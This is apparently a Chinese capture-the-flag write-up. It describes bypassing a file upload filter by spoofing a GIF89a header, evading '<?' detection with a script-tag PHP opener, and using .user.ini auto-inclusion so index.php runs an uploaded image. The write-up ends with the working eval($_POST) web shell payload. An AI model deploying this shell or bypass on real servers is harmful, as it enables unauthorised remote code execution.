.user.ini文件上传利用–需要上传目录有一个php文件(index.php),文件头绕过,文件内容<?检测
phtml.php3.php6...都没成功,看来是白名单了。
jpg文件查看一下其他过滤和上传目录,发现还存在文件头检测和对文件内容的检测。文件头添加GIF89a?即可绕过,的检测可以继续使用js代码执行php代码的方式

index.php文件。那看来是使用.user.ini文件了,该文件能够实现文件包含内容,前提就是上传的目录下有一个php文件,这样使用.user.ini包含的文件就可以执行文件内的php代码了
.user.ini和shell.jpg文件即可,绕过文件头和文件内容即可成功上传

.user,ini配置文件,index.php的php文件,和含有恶意代码的jpg文件,只需要访问该php文件即可自动包含jpg文件执行其中的恶意代码,所以蚁剑连接的地址也是该php文件。直接蚁剑连接,在根目录下拿下flag


<script language="php">eval($_POST['a']);</script>
GIF89a?